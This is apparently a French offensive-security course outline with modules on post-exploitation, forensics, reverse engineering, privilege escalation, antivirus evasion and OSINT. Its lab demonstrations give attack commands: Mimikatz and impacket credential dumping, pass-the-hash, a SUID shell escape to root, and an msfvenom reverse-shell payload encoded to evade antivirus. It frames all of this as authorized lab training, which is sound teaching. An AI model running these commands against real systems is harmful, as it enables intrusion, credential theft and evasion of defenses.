Post-exploitation avancée, forensics, reverse engineering, et attaques de novo réseau
🏴14 leçons
Post-Exploitation Avancée
Persistence, lateral movement, exfiltration de données, et Active Directory attacks
Pourquoi c'est important : En audit, la post-exploitation avec shells Meterpreter révèle l'impact réel : extraction de credentials, mouvement latéral et accès au contrôleur de domaine, bien au-delà de la preuve d'intrusion initiale.
L'analogie qui aide : Pensez à une planque installée dans la maison après y être entré : vous y cachez des copies de clés, un plan des pièces et une sortie discrète pour revenir sans forcer à nouveau.
Démonstration pas à pas : Déroulez en lab : dans Meterpreter, load mimikatz charge l'extension, sekurlsa::logonpasswords lit les mots de passe en mémoire, puis impacket-secretsdump domaine/utilisateur:motdepasse@cible extrait SAM et LSA à distance. Chaque shell obtenu se documente avec sysinfo et getuid avant toute action.
Pièges classiques : Pièges : déclencher l'EDR avec Mimikatz en clair, perdre ses shells sans persistance documentée, ou exfiltrer des données réelles. Agissez uniquement en lab isolé, avec autorisation écrite et périmètre Active Directory dédié, car toute intrusion hors cadre relève de l'art. 323-1.
À vous de jouer : Que permet le Pass-the-Hash ?Voir la réponse
Il réutilise un hash NTLM volé pour s'authentifier sans connaître le clair, par exemple avec impacket-psexec domaine/utilisateur@cible -hashes LM:NTLM, et prouve l'impact du vol de hashes.
🔍12 leçons
Digital Forensics
Analyse forensique de disques, mémoire, réseaux, et volatilité
Pourquoi c'est important : En réponse à incident, la forensics révèle la chronologie exacte : comment l'attaquant est entré, ce qu'il a touché et ce qu'il a exfiltré. Sans méthode, aucune preuve n'est recevable.
L'analogie qui aide : Pensez au relevé d'empreintes : on photographie avant de toucher, on porte des gants et on scelle chaque sachet. L'image disque et son hash jouent ce rôle de scellé.
AutopsyVolatilityFTK ImagerPlasoTimeline
01 Méthodologie forensique
02 Acquisition de preuves (dd, FTK Imager)
03 Autopsy — analyse de disques
04 Analyse de systèmes de fichiers
05 Récupération de fichiers supprimés
06 Analyse de mémoire avec Volatility
07 Analyse de registre Windows
08 Forensics de navigateur web
09 Timeline analysis
10 Network forensics
11 Anti-forensiques et détection
12 Projet : enquête forensique complète
Démonstration pas à pas : Déroulez en lab forensics : dd if=/dev/sda of=/mnt/externe/image.dd bs=4M status=progress copie bit à bit, puis md5sum /dev/sda et md5sum image.dd doivent correspondre pour prouver l'intégrité. Analysez la mémoire avec volatility -f memory.raw --profile=Win7SP1x64 pslist où pslist liste les processus et psxview trahit les processus cachés.
Pièges classiques : Pièges : analyser le disque d'origine au lieu de la copie, oublier le bloqueur en écriture, ou travailler sans journalisation. Manipulez uniquement des images de votre lab isolé et conservez chaque hash.
À vous de jouer : Pourquoi hasher l'image disque avec md5sum ou sha256sum ?Voir la réponse
Le hash prouve que la copie est identique à l'original et qu'aucune altération n'a eu lieu pendant l'analyse, condition indispensable pour verser la preuve au rapport.
⚙️12 leçons
Reverse Engineering
Analyse de binaires, décompilation, debug, et désassemblage
Pourquoi c'est important : En audit malware, le reverse engineering révèle les appels malveillants cachés : domaines de commande, persistance et anti-analyse que l'antivirus n'a pas expliqués.
L'analogie qui aide : Pensez à démonter une serrure sur l'établi : vous notez chaque goupille et ressort sans forcer, jusqu'à comprendre quelle clé la fait tourner.
GhidraRadare2GDBIDA ProFLOSS
01 Introduction au RE
02 Assembly x86/x64
03 Ghidra — décompilation
04 Radare2 — analyse de binaires
05 GDB — debugging
06 Analyse de malware statique
07 Analyse de malware dynamique
08 Conteneurs et sandboxing
09 Analyse de binaires ELF
10 Analyse de PE Windows
11 Désobfuscation et unpacking
12 Projet : analyse de malware réel
Démonstration pas à pas : Déroulez en lab : r2 -A ./binaire ouvre avec analyse, iz liste les chaînes, ii montre les imports d'API, puis pdf @main désassemble la fonction principale. Dans Ghidra, importez le binaire, lancez l'analyse automatique, double-cliquez sur main et renommez les variables pour lire la logique.
Pièges classiques : Piège majeur : exécuter le binaire suspect sur votre poste au lieu d'une sandbox ou d'une VM snapshots. Isolez le lab du réseau, figez un instantané avant chaque exécution, et ne sortez aucun échantillon.
À vous de jouer : Que révèle la table des imports d'un binaire ?Voir la réponse
Elle liste les fonctions système appelées, par exemple écriture mémoire ou accès réseau, ce qui oriente l'analyse vers les comportements suspects à confirmer en décompilation.
👑12 leçons
Escalade de Privilèges
Linux & Windows privesc, kernel exploits, SUID, et techniques avancées
Pourquoi c'est important : En audit, la privesc révèle si un simple compte volé devient administrateur : un binaire SUID ou une règle sudo mal écrite suffit à passer de www-data à root.
L'analogie qui aide : Pensez à l'échelle de service de l'immeuble : discrète et réservée au personnel, elle mène pourtant au toit. Les chemins SUID et cron sont cette échelle.
Démonstration pas à pas : Déroulez en lab privesc Linux : sudo -l liste vos droits sudo, find / -perm -4000 -type f 2>/dev/null liste les binaires SUID où -4000 filtre le bit SUID et 2>/dev/null masque les erreurs. Croisez chaque binaire avec GTFOBins : si find est SUID, find . -exec /bin/sh \; -quit donne un shell root de test.
Pièges classiques : Pièges : lancer un kernel exploit qui plante la VM, modifier un cron de production, ou tester hors snapshot. Figez un instantané de votre lab isolé avant chaque tentative et notez chaque commande pour le rollback.
À vous de jouer : Quelle commande liste les binaires SUID sur Linux ?Voir la réponse
La commande find / -perm -4000 -type f 2>/dev/null affiche tous les fichiers avec le bit SUID, point de départ de toute recherche privesc Linux.
👻10 leçons
Évasion d'Antivirus & Defenses
Bypass AV/EDR, offuscation de code, et techniques d'évasion avancées
Pourquoi c'est important : En mission Red Team, l'évasion révèle si l'EDR détecte vraiment : un payload naïf bloqué en une seconde prouve que la défense signature fonctionne, un contournement documenté prouve ses angles morts.
L'analogie qui aide : Pensez au déguisement : changer de manteau trompe un contrôle rapide, mais il faut aussi changer de démarche et d'accent pour passer un barrage attentif.
Démonstration pas à pas : Déroulez en lab : msfvenom -p windows/meterpreter/reverse_tcp LHOST=x -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe où -e choisit l'encodeur et -i 10 répète dix passes. Testez contre votre EDR de lab, puis comparez avec une exécution en mémoire via C# pour mesurer ce que la seule offuscation apporte.
Pièges classiques : Pièges : croire que l'encodeur suffit face à l'heuristique moderne, ou envoyer son payload sur un service public qui le redistribue aux éditeurs. Testez uniquement en lab isolé hors ligne, avec échantillons marqués et autorisation écrite.
À vous de jouer : Pourquoi la détection par signature seule ne suffit-elle plus ?Voir la réponse
Parce qu'un simple ré-encodage ou reconditionnement change le hash sans changer le comportement, d'où la bascule vers l'heuristique, l'AMSI et l'EDR comportemental.
🕵️10 leçons
OSINT — Renseignement Open Source
Recherche avancée, investigation digitale, et collecte de renseignement
Pourquoi c'est important : En audit, l'OSINT révèle la surface exposée avant le premier paquet : emails, sous-domaines et documents indexés qui serviront au spear phishing ou au password spray.
L'analogie qui aide : Pensez à fouiller les poubelles légales devant l'immeuble : prospectus, cartons et factures jetés racontent qui vit là, sans jamais entrer.
MaltegoRecon-ngSpiderFootShodantheHarvester
01 Méthodologie OSINT
02 Google dorking avancé
03 theHarvester — collecte emails
04 Recon-ng — framework OSINT
05 Maltego — analyse de relations
06 Shodan — IoT et services exposés
07 SpiderFoot — automatisation
08 Investigation sur les réseaux sociaux
09 Géolocalisation et images
10 Projet OSINT complet
Démonstration pas à pas : Déroulez en lab : theharvester -d cible.com -b all où -d fixe le domaine et -b all interroge toutes les sources pour emails et hôtes. Complétez avec shodan search hostname:cible.com pour les services exposés et exiftool photo.jpg pour lire GPS et appareil dans les métadonnées.
Pièges classiques : Pièges : harceler des personnes réelles, stocker des données personnelles sans base légale, ou confondre homonyme. Limitez-vous aux périmètres autorisés par écrit et aux comptes de test de votre lab isolé.
À vous de jouer : Que collecte theHarvester ?Voir la réponse
Il collecte emails, sous-domaines, hôtes et adresses IP exposés publiquement pour un domaine, afin de nourrir la cartographie et le ciblage autorisé.